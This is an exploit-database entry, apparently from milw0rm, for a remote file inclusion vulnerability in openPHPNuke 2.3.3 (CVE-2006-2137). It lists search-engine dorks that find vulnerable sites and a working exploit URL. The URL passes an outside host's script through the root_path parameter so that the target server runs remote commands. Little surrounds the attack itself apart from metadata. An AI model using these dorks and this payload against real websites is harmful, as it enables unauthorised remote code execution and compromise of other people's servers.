openPHPNuke 2.3.3 - Remote File Inclusion

EKU-ID: 9758	CVE: OSVDB-25140;CVE-2006-2137	OSVDB-ID:
Author: [Oo]	Published: 2006-04-29	Verified:
Download:

Rating

☆☆☆☆☆

Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
URL: http://www.openphpnuke.com/
Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
Credits: [Oo]

Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-29]